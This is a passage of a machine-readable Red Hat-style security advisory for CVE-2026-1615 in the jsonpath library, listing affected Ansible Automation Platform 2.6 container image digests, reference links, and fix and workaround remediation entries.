"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3c83b77b1291ae9e3003b1eb16bcd1b21752733d5ea0b7f9193bea2ba9302215_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6d333bdef78bef7ba85b04a1a6c5d33591263371b5f740813efae68788e32a6c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:86ac843a55e47fa052c11f263a0ebf4f0c969cf5f60f62a5b88006c963f5b772_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:b77fba98853eb0fabcbcd4981c347cf909f50e64ea32f4c0d8313d89cdb48cf7_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:094676fb53084cc7ca93010b2667fde26a83c78bd84af7dfef86e27149fc2385_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:1ba54fa91703c8105080e534a74b85b257c0123abb87d9aa4c05f05e32c24c9b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21582b96b79a5a1800ce288633970ed7303655e31a202993df84159d3dca7826_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:d6adc9bd2df9fded6228ddd5dbca3919991913b40fb95b12d4d01cf96c5f4d60_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-1615"
},
{
"category": "external",
"summary": "RHBZ#2437875",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2437875"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-1615",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-1615"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-1615",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1615"
},
{
"category": "external",
"summary": "https://github.com/dchester/jsonpath/blob/c1dd8ec74034fb0375233abb5fdbec51ac317b4b/lib/handlers.js%23L243",
"url": "https://github.com/dchester/jsonpath/blob/c1dd8ec74034fb0375233abb5fdbec51ac317b4b/lib/handlers.js%23L243"
},
{
"category": "external",
"summary": "https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-15141219",
"url": "https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-15141219"
},
{
"category": "external",
"summary": "https://security.snyk.io/vuln/SNYK-JS-JSONPATH-13645034",
"url": "https://security.snyk.io/vuln/SNYK-JS-JSONPATH-13645034"
}
],
"release_date": "2026-02-09T05:00:09.050000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-31T23:31:56+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6309"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3c83b77b1291ae9e3003b1eb16bcd1b21752733d5ea0b7f9193bea2ba9302215_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6d333bdef78bef7ba85b04a1a6c5d33591263371b5f740813efae68788e32a6c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:86ac843a55e47fa052c11f263a0ebf4f0c969cf5f60f62a5b88006c963f5b772_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:b77fba98853eb0fabcbcd4981c347cf909f50e64ea32f4c0d8313d89cdb48cf7_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:094676fb53084cc7ca93010b2667fde26a83c78bd84af7dfef86e27149fc2385_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:1ba54fa91703c8105080e534a74b85b257c0123abb87d9aa4c05f05e32c24c9b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21582b96b79a5a1800ce288633970ed7303655e31a202993df84159d3dca7826_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:d6adc9bd2df9fded6228ddd5dbca3919991913b40fb95b12d4d01cf96c5f4d60_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
